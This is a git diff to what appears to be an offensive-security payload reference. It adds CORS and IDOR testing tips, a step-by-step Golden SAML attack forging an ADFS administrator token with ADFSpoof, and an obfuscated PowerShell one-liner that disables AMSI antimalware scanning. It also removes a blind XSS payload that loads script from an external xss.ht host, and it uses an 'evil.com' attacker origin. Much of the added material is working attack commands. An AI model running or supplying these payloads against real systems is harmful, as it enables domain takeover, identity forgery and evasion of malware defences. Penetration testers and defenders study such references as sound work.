diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index b4f2b38..9a1186c 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -11,9 +11,11 @@ ## Tools -* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/) +* [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/) +* [chenjj/CORScanner - Fast CORS misconfiguration vulnerabilities scanner](https://github.com/chenjj/CORScanner) * [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html) + ## Prerequisites * BURP HEADER> `Origin: https://evil.com` diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md index 7f5ac43..c3fda4c 100644 --- a/Insecure Direct Object References/README.md +++ b/Insecure Direct Object References/README.md @@ -6,14 +6,15 @@ * [Tools](#tools) * [Exploit](#exploit) + * [IDOR Tips](#idor-tips) * [Examples](#examples) * [References](#references) ## Tools -- Burp Suite plugin Authz -- Burp Suite plugin AuthMatrix -- Burp Suite plugin Authorize +- [BApp Store > Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e) +- [BApp Store > AuthMatrix](https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e) +- [BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f) ## Exploit @@ -43,6 +44,15 @@ The value of a parameter is used directly to access application functionality http://foo.bar/accessPage?menuitem=12 ``` +### IDOR Tips + +* Change the HTTP request: POST → PUT +* Change the content type: XML → JSON +* Increment/decrement numerical values (1,2,3,..) +* GUID/UUID might be weak +* Transform numerical values to arrays: `{"id":19} → {"id":[19]}` + + ## Examples * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 75bb712..bfee165 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -86,6 +86,8 @@ - [ESC9 - No Security Extension](#esc9---no-security-extension) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Pass-The-Certificate](#pass-the-certificate) + - [Active Directory Federation Services](#active-directory-federation-services) + - [ADFS - Golden SAML](#adfs---golden-saml) - [UnPAC The Hash](#unpac-the-hash) - [Shadow Credentials](#shadow-credentials) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) @@ -1592,6 +1594,8 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred - > One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it. +:warning: You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future. + * Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA) ```ps1 # Enumerate all gMSAs @@ -2639,6 +2643,43 @@ Jane@corp.local is allowed to enroll in the certificate template ESC9 that speci certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx" ``` +### Active Directory Federation Services + +#### ADFS - Golden SAML + +Requirements: +* ADFS service account +* The private key (PFX with the decryption password) + +Exploit: +* Use [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) to dump ADFS informations +* Convert PFX and Private key to binary format + ```ps1 + # For the pfx + echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin + # For the private key + echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin + ``` +* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) + ```ps1 + mkdir ADFSpoofTools + cd $_ + git clone https://github.com/dmb2168/cryptography.git + git clone https://github.com/mandiant/ADFSpoof.git + virtualenv3 venvADFSSpoof + source venvADFSSpoof/bin/activate + pip install lxml + pip install signxml + pip uninstall -y cryptography + cd cryptography + pip install -e . + cd ../ADFSpoof + pip install -r requirements.txt + python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls + /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' + ``` + + ### UnPAC The Hash Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate. @@ -4044,3 +4085,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) +* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - AMSI Bypass.md b/Methodology and Resources/Windows - AMSI Bypass.md index 40573d3..e5f05ba 100644 --- a/Methodology and Resources/Windows - AMSI Bypass.md +++ b/Methodology and Resources/Windows - AMSI Bypass.md @@ -759,6 +759,15 @@ Add-Type -TypeDefinition $Winpatch -Language CSharp [patch]::it() ``` +## Other interesting AMSI bypass + +* [tihanyin/PSSW100AVB/AMSI_bypass_2021_09.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1) + ```ps1 + $A="5492868772801748688168747280728187173688878280688776828" + $B="1173680867656877679866880867644817687416876797271" + [Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " " ).GetField([string](38..51|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " ",'Non' + 'Public,Static').SetValue($null,$true) + ``` + ## AMSI.fail > AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/ diff --git a/Upload Insecure Files/Images/file-upload-mindmap.png b/Upload Insecure Files/Images/file-upload-mindmap.png new file mode 100644 index 0000000..964d174 Binary files /dev/null and b/Upload Insecure Files/Images/file-upload-mindmap.png differ diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 6ee8adc..15083b8 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -23,8 +23,11 @@ - [Burp > Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa) - [ZAP > FileUpload AddOn](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/) + ## Exploits +![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true) + ### Defaults extensions * PHP Server diff --git a/XSS Injection/README.md b/XSS Injection/README.md index da1e166..6b53335 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -501,14 +501,9 @@ XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https: > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. -```javascript -"> - -javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)') - - - - +```xml +"> + ``` ### Other Blind XSS tools